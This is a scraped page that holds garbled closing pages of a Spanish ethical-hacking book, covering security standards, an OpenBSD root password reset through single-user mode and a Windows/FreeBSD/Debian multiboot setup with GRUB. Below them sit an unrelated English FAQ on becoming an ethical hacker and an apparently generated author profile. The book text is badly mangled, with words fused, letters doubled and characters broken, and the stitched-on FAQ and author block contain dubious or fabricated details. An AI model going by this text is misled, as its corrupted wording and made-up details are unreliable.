reless, Bluetooth, Voip, deniales de servicio, man in the middle attacks, ingenieríainversa, hacks en los kernels en múltiples plataformas, hacks en los binarios dentrode varias arquitecturas, ataques contra sistemas de detección de intrusos, spoofing,esconder payloads en archivos, shellcoding, firewalls, routers, sniffing, técnicasblind, de tunneling, inyeccion dll, etcétera.

KeyScrambler. En www.qfxsoftware.com podremos encontrar lo que llamanhoy por hoy la mejor solucion para el keylogging ya que, esta aplicacion cifraen memoria todo lo que se teclea, haciendo inentendible el log de alguna

aplicacion tipo espia que grabe dicha información.

Por último está el objetivo. Una nueva aplicación puede llegar a requerir una for-ma diferente de embate, quizás con alguna técnica ya conocida, como SQL injec-

312

En la página del Instituto Nacional de Tecnologías de la Información INTECO (www.inte-co.es), podemos encontrar documentos muy interesantes relacionados con actividades IT.Por ejemplo, si vamos a la sección OBSERVATORIO, dentro de Área Jurídica de la Seguri-dad y las TIC, encontraremos modelos de contratos tecnológicos y guías legales.

Contratos y cuestiones legales

Hacking Etico - [PDF Document] (316)

tion, pero aplicada de algún modo innovador para lograr así algún tipo de inci-dencia en el sistema (evasión de controles por ejemplo).

METODOLOGÍAS Y NORMATIVAS EXISTENTES

En principio, hay que diferenciar bien sobre qué tipo de documentación habla-mos. Existen metodologías escritas puramente para guiar al personal de sistemaspara llevar a cabo determinados chequeos de seguridad informática y, por otro la-do, están las normativas para la gestión de la seguridad de la información en ge-neral o para organizar determinados aspectos de ésta.

313

Hacking Etico - [PDF Document] (317)

314

Para cambiar la contraseña de root en modo físico de OpenBSD, tenemos que bootearen modo single user con la opción boot —s. Luego, debemos montar el sistema conmount -a y ejecutar passwd. A continuación, tipeamos la nueva clave, la repetimos pa-ra verificarla y por último, reiniciamos con shutdown —r now.

Contraseña en OpenBSD

Hacking Etico - [PDF Document] (318)

Guía. En www.unal.edu.co/seguridad/documentos/guia_para_elaborar_politicas_v1_0.pdf encontraremos

un documento muy claro y útil que elaboró, mediante traducción y adaptación laUniversidad Nacional de Colombia. En él, se explica cómo elaborar políticas de seguridad.

Las grandes organizaciones (formales) o aquellas que manejan activos sensibles deinformación, al encontrarse con la necesidad u obligación de tener que protegerlos,se alinean a éstas para establecer un SGSI, Sistema de Gestión de Seguridad de laInformación (ver UNE ISO/IEC 27001:2007), o suelen consultarlas cuando se so-meten a procesos puntuales de auditorías u orden.Esta normativa también puede ser dedicada para asegurar la continuidad de susnegocios (planes BCP, DRP), para analizar riesgos, implementar determinadaspolíticas, controles físicos, legales, etcétera. Algunas de las más conocidas en ges-tión son: ISO (familia 27000 - 17799), IRAM, Sarbanes Oxley, SANS, SPTED,Technet/Microsoft, ITIL, MAGERIST, NIST, Cobit, BS, ISM3, BSI, ITSEC/ITSEM, GAIT, HTCIA y CompTIA.

315

En el sitio:www.security-database.com/toolswatch/Turning-Firefox-to-an-auditing.htmlpodrán encontrar como utilizar y transformar Firefox en una plataforma de testeo.

Firefox como plataforma de chequeo

Hacking Etico - [PDF Document] (319)

316

Gray. En Amazon pueden conseguir el libro GGrraayy HHaatt HHaacckkiinngg, de Shon Harris.

Hacking Etico - [PDF Document] (320)

Bonus Track > SistemamultiplataformaEn este último apartado veremos

cómo instalar FreeBSD, Debian GNU/Linux

y Windows XP Professional en un sólo

disco duro. Así podremos utilizar o

estudiar todos sus recursos y

prestaciones, para ampliar nuestros

conocimientos.

Hacking Etico - [PDF Document] (321)

INSTALAR UNA PLATAFORMA MULTISISTEMA

La unidad es la variedad, y la variedad en la unidad es la leysuprema del universo.

Isaac Newton (1643-1727)

Hoy en día, es posible conseguir discos duros de grandes capacidades a un costomuy conveniente, y también hay interesantes sistemas operativos libres que seencuentran bastante evolucionados. ¿Por qué entonces no tener una estación detrabajo o un servidor con todos ellos conviviendo bajo un mismo disco?

Ventajas

La principal ventaja es poder conocer bien los sistemas operativos en todos lossentidos y aprovechar sus características técnicas: seguridad, performance, intera-cción, robustez y paquete de utilidades.Nos sirve para practicar administración de aplicaciones como ApacheWebserver o base de datos, tal como MySQL. También nos ayuda a aprenderhardening (cómo asegurar cada sistema operativo) y a llevar a cabo chequeos deseguridad desde diferentes herramientas y plataformas, ya que cada una tiene suversatilidad y cuenta con diferente disponibilidad de utilidades. Es útil paraclonar objetivos (aplicaciones, escenarios u hosts) que vamos a chequear, paramontar honeypots temporarios, para reproducir la explotación de determinadasvulnerabilidades por analizar.Sirve para programar bajo diferentes entornos y lenguajes como C, Python, Perl,bash scripting y otros, para desarrollar una mayor diversidad de exploits, scriptsy herramientas de auditoría y para conocer los diferentes modos de seteo paraéstos dentro del networking.Por otro lado, nos ayuda a comprender la interacción entre sistemas operativosaplicando técnicas de análisis forense digital (en caliente y frío), descubrir fuentesde datos digitales (registros de acciones) como también metodologías.Sirve para testear nuevas aplicaciones o scripts en diversos contextos, para emularsistemas y virtualizar aplicaciones y, en caso de que un sistema operativo seinutilice, inmediatamente podemos contar con el resto.

Instalación de los sistemas

Por todo esto, veremos a continuación cómo instalar estos tres sistemas operativos

318

Hacking Etico - [PDF Document] (322)

de la manera más fácil posible. Nos enfocaremos principalmente en el particionadobásico y correcto, ya que el resto de las tareas se llevan a cabo según el hardwareque tengamos, nuestros gustos, necesidades y tareas.

Disco. Disco SATA de 7200 revoluciones y 8 megas de cachéa punto de ser particionado para hacer una estación/server multiboot.

Como primer paso, tomamos un disco duro de 320 Gigas nuevo y vacío. En estecaso, utilizaremos un Samsung modelo HD320KJ. Lo instalamos en un equipo ylo particionamos con Paragon Partition Manager Professional (o cualquier otroprograma de particionado) de la siguiente manera:

• Asignamos 240 Gigas aproximadamente para Windows XP Professional (muchoespacio destinado para alojar pesadas rainbow tables y software).• 30 Gigas aproximadamente para Debian Linux.• 30 Gigas aproximadamente para FreeBSD.

319

Aqui estÆ la forma de instalar OpenBSD, considerado el sistema operativo mÆs se-

do por defecto www.openbsd.org/faq/es/faq4.html al que solo se le han descubier

vulnerabilidades remotas en muchos aæos.

OpenBSD

Hacking Etico - [PDF Document] (323)

En los dos últimos casos, dejamos suficiente lugar en cada uno como para no tenerproblemas de almacenamiento ni errores relacionados con inodes(http://es.wikipedia.org/wiki/Inodo).

Particionado. Aquí podemos ver cómo quedó particionado el disco. Una particiónen NTFS de 240 Gigas y dos de 30. La de Linux particionada en modo Ext2y la que dejaremos para FreeBSD por ahora figura como espacio libre.

Procedemos a instalar primero el sistema operativo Windows XP Professional SP2en español. Para eso, booteamos desde el CD y seguimos el proceso típico deinstalación. Una vez que llegamos al momento de hacer las particiones, elegimos laC:, presionando Enter sobre ella.

A continuación, formateamos la unidad C: en modo NTFS rápido. Luego, secopiarán los archivos que se van a instalar, se reiniciará el sistema y comenzará elproceso de instalación. Cuando se nos solicite, deberemos ingresar nuestro nombrey el de la organización, el número de serie del producto y el nombre de la máquinay la contraseña del administrador. Posteriormente, establecemos la fecha, la hora yla zona horaria y, para terminar, activamos el sistema.

320

Hacking Etico - [PDF Document] (324)

Particiones. Vista de las particiones disponibles en el proceso de instalación de WindowsXP.

Si deseamos crear una versión instalable de Windows XP desatendida (que seinstale sola sin requerir nuestra interacción luego de bootear el CD) con todos losparches incluidos a la fecha, podemos utilizar la aplicación nLite, que es posibledescargar de www.nliteos.com.Cuando finalizamos con la instalación, actualizamos Windows XP con Winup(www.winup.es), un archivo que contiene todos los parches a la fecha y nos da laposibilidad de actualizar la máquina offline, de un modo rápido y seguro (sinexponerla a Internet desactualizada).Ahora instalaremos FreeBSD 6.2, que podemos descargar de:ftp://ftp7.freebsd.org/pub/FreeBSD/ISO-IMAGES-i386/6.2. De los dos CDque bajamos, tomamos el primero y lo booteamos tal como hicimos con Windows.Pasamos a setear las configuraciones simples a nuestro gusto y, en cuanto aparece

321

Este procedimiento es el mismo en las versiones FreeBSD 7.0, Windows XP SP3 y

que son las que salieron al momento de imprimirse este libro. Lo unico que cam-

kearlas en el gestor de arranque Grub. Por ello, mirar bien los nombres de lo-

nu.lst al editarlo para as no tener inconvenientes, presten suma atenci n a

Actualización

Hacking Etico - [PDF Document] (325)

el FreeBSD Disklabel Editor, elegimos la partición ad4s3.

FreeBSD. Pantalla que aparece una vez que elegimosla partición aadd44ss33, destinada a alojar el sistema operativo FreeBSD 6.2.

Luego pulsamos la letra A para que se asignen los sectores correctos (swap, /var,/tmp y /usr) de partición automáticamente dentro de esa porción de disco y, paraterminar, presionamos Q.

FreeBSD. Pantalla del FreeBSD DisklabelEditor con el espacio seteado de la partición.

Seleccionamos la opción Standard – Begin a Standard installation

322

Hacking Etico - [PDF Document] (326)

(recommended), elegimos la instalación de todos los paquetes ALL –Allsystem sources, binaries, and X Windows system- que, mientras soninstalados, nos pueden solicitar cambiar el CD1 por el CD2.

Cuando en el final se nos pregunta si deseamos escribir la MBR, seleccionamos laopción NONE Leave the master boot record untouched y hacemos clic en OKo pulsamos Enter para finalizar. Luego, FreeBSD seteará algunas cosas, como laconexión de Internet a través de DHCP para asignar una IP y salir navegando porInternet. Si no deseamos setear alguno de estos puntos, sólo hay que presionar No,la opción más recomendada si no sabemos exactamente lo que debemos setear.Para hacerlo luego, podemos ejecutar sysinstall desde la Shell.

Por último, instalaremos Debian GNU/Linux, que a su vez dejará instalado Grubcomo gestor de arranque en la MBR (sector de arranque del disco duro). Luego,cuando iniciemos el equipo, se ejecutará el gestor de arranque mostrando un menúdesde el cual se podrá optar por los diferentes sistemas operativos que tiene el discoduro. Los DVD de Debian GNU/Linux pueden bajarse desde http://cdimage.debian.org/debian-cd/4.0_r2/i386/iso-dvd. Cabe aclarar que, aunque con el pri-mero es suficiente, si nos interesa tener todas sus aplicaciones conviene bajar lostres que hay disponibles.

Booteo. Pantalla con el logo de Debian que se ve al bootearel DVD. Podemos bootearlo desde CD, pero éstos son en total 21y el cambio durante su instalación resulta bastante incómodo.

323

Hacking Etico - [PDF Document] (327)

Después de bootear, deberemos establecer el lenguaje, el país y la distribución deteclado. Luego, tendremos que esperar una pequeña comprobación del DVD oCD para pasar a la parte más crítica, que es el particionado. Debemos marcar laopción que dice ESPACIO LIBRE. Luego, en la siguiente pantalla,seleccionamos Particionar de forma automática el espacio libre. Después, enel Esquema de particionado, tenemos que elegir Todos los ficheros en unapartición (recomendado para novatos) y presionar Enter.

Debian. Pantalla del EEssqquueemmaa ddee ppaarrttiicciioonnaaddoo de Debian.

Por último, seleccionamos Finalizar el particionado y escribir los cambiosen el disco. Luego, seteamos la clave de root y colocamos nuevamente la clavepara su verificación. Creamos un usuario normal y también le asignamos suclave. Se instala el sistema base, seleccionando Duplicación en red. Cuando senos da la opción de elegir los programas que se van a instalar, basta con dejar elseteo por defecto (Escritorio+Base).

Luego de instalarse el sistema completo, estará disponible el gestor de arranqueGrub, que sólo detectará Windows y Debian al reiniciar la máquina. Por tal motivo,lo último que haremos es configurar Grub para que arranque los tres sistemasoperativos instalados.

El archivo de configuración de Grub se encuentra, bajo Debian, en /boot/grub/menu.lsty debe ser editado con vi desde una sesión shell en Debian o con el PartitionExplorer (módulo de Paragon Partition Manager Professional) desde Windows. La

324

Hacking Etico - [PDF Document] (328)

función Export es útil para editarlo en Windows con Notepad e Import paravolver a colocarla en Debian editada.

Editando. Utilización de Partition Explorer para editar el archivommeennuu..llsstt de Grub (gestor de arranque) que contiene los puntosde arranque de cada partición de los sistemas operativos.

Sin importar la herramienta que usemos para editar ese archivo, lo importante es elcontenido, que debe quedar exactamente así:

—-8<titleMicrosoft Windows XP Professional SP2root (hd0,0)savedefaultmakeactivechainloader +1titleDebian GNU/Linux 4.0 r02root (hd0,1)kernel /boot/vmlinuz-2.6.18-5-686 root=/dev/sda2 ro initrd /boot/initrd.img-2.6.18-5-686savedefaulttitleFreeBSD 6.2 root (hd0,2,a)kernel /boot/loader

325

Hacking Etico - [PDF Document] (329)

boot—-8<

Una vez que editamos el archivo y guardamos los cambios, podemos reiniciar lamáquina y disfrutar de un servidor/estación de trabajo multiplataforma.

Booteo. Aspecto del menú de arranque Grub.

Recordemos que, para levantar el sistema gráfico en FreeBSD, debemos escribirecho exec startkde>.xinitrc en la consola de root una vez logueados. Luego, paraejecutar el entorno gráfico, escribimos startx y presionamos Enter.

KDE. El reluciente aspecto de KDE 3.5 sobre

326

Hacking Etico - [PDF Document] (330)

Cuando tenemos todo instalado, debemos actualizar los sistemas, configurardetalles de auditoría o performance, deshabilitar los servicios innecesarios e instalarlas herramientas que creamos convenientes. Si tenemos alguna duda, no olvidemos consultar sobre cualquiera de los sistemasoperativos en las listas y los foros de sus respectivas comunidades o grupos deusuarios. Entre ellos, podemos mencionar los siguientes:

www.freebsd.org/es/projects/newbies.htmlhttp://listas.es.freebsd.org/pipermail/freebsd/www.linux.org/groups/index.htmlwww.usla.org.ar/modules/newbb/www.solar.org.ar

Gnome. La interfaz Gnome sobre Debian 4.0 r02.

Por último, si desean probar algo nuevo en sistema operativo visiten:www.opensolaris.com

# exit$ exitConnection closed by foreign host.

327

Hacking Etico - [PDF Document] (331)

328

A todos aquellos que creen que sus carreras no tienen rumbo les cuento que:Einstein al no encontrar trabajo, llegó a dar clases particulares de física a 3 francosla hora, en Viena (Berna) 1902, un año antes de casarse y de tener su primer hijo.Dos años luego, escribiría 4 artículos revolucionarios en la física, en 1905 descubreel proceso fotoeléctrico entre otras cosas, por el cual en 1921 recibe el premioNobel. Einstein a lo largo de su vida obtendría 25 nombramientos como Doctor

Honoris Causa.

“Nunca consideres el estudio como una obligación, sino como una oportunidadpara penetrar en el bello y maravilloso mundo del saber.” A.E

Este libro fue liberado por el autor el día Lunes 11 de Julio de 2011, todos susderechos y contenido estan registrados.

Hacking Etico - [PDF Document] (2024)

FAQs

Which book is best to become a hacker? ›

Best Ethical Hacking Books for Beginners
  • Hacking: The Art of Exploitation.
  • Gray Hat Hacking: The Ethical Hacker's Handbook.
  • Ethical Hacking: A Hands-on Introduction to Breaking In.
  • The Web Application Hacker's Handbook.
  • The Basics of Hacking and Penetration Testing.

What is an ethical hacking course? ›

Ethical hacking is a process of detecting vulnerabilities in an application, system, or organization's infrastructure that an attacker can use to exploit an individual or organization. They use this process to prevent cyberattacks and security breaches by lawfully hacking into the systems and looking for weak points.

Who is the No 1 ethical hacker in world? ›

1. Kevin Mitnick: Kevin Mitnick A household name in the hacking community, Kevin Mitnick's exploits in the 1980s and 90s made him a legend. However, after serving his time and embracing ethical hacking, Mitnick has become a sought-after security consultant, speaker, and author.

What do hackers learn first? ›

Where should beginner hackers start? Beginners should start with the fundamental cybersecurity skills one will always need when hacking: Networking, Linux, Windows, and scripting. Regardless of how advanced or basic your exploits become, you'll always call upon the knowledge and skills related to these core domains.

What is ethical hacker salary? ›

The average salary for Ethical Hacker is ₹2,18,000 per month in the India. The average additional cash compensation for a Ethical Hacker in the India is ₹1,68,000, with a range from ₹24,167 - ₹4,35,000.

How many days to learn hacking? ›

Top Online Ethical Hacking Courses
CourseDuration
Certified Ethical Hacker Certification40 hours
Ethical Hacking Essentials (EHE)15 hours
Metaxone Certified Ethical Hacker2 months
CERTIFIED SECURITY PROFESSIONAL12 weeks
5 more rows
Mar 6, 2024

What are the 5 stages of ethical hacking? ›

These steps of hacking include: Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Clearing Track. While not every hacker follows these steps in sequential order, they offer a systematic approach that yields better results. Let us take a closer look at what these hack phases offer.

What should I study if I want to be a hacker? ›

Ethical hacking requires a strong technical knowledge of computer systems, networks, and best security practices. To obtain the necessary skills and knowledge, a person must pursue formal education, such as a degree in computer science, or pursue a specialized certification in ethical hacking.

What is the best hacker qualification? ›

Ethical Hacking Diploma and Degree Programmes
Programme NameTotal DurationAverage Fees (INR)
Diploma in Ethical Hacking & Cyber Security1-2 years50,000
BTech Cyber Security4 Years6-12 L
BSc Networking3 years60k-3L
BTech CSE (Cyber Security and Forensics)4 Years6-8 L
2 more rows
Mar 6, 2024

What should I know if I want to be a hacker? ›

Here are the top 5 skill sets needed by every kind of ethical hacker.
  • Basic Programming. Just like everyone thinks that hackers are experts at programming, programming is one of the prerequisites needed by every ethical hacker. ...
  • Computer Networking. ...
  • Linux. ...
  • DBMS. ...
  • Computer Knowledge. ...
  • Practice.

Can you train to be a hacker? ›

And to learn how to start filling this need, you don't have to wait around for a shadowy figure to tap you on the shoulder; you can take hacking classes or go through an intensive hacking bootcamp. This is the kind of ethical hacking that a motivated person can learn, and turn into a career.

Top Articles
Latest Posts
Article information

Author: Patricia Veum II

Last Updated:

Views: 6084

Rating: 4.3 / 5 (44 voted)

Reviews: 83% of readers found this page helpful

Author information

Name: Patricia Veum II

Birthday: 1994-12-16

Address: 2064 Little Summit, Goldieton, MS 97651-0862

Phone: +6873952696715

Job: Principal Officer

Hobby: Rafting, Cabaret, Candle making, Jigsaw puzzles, Inline skating, Magic, Graffiti

Introduction: My name is Patricia Veum II, I am a vast, combative, smiling, famous, inexpensive, zealous, sparkling person who loves writing and wants to share my knowledge and understanding with you.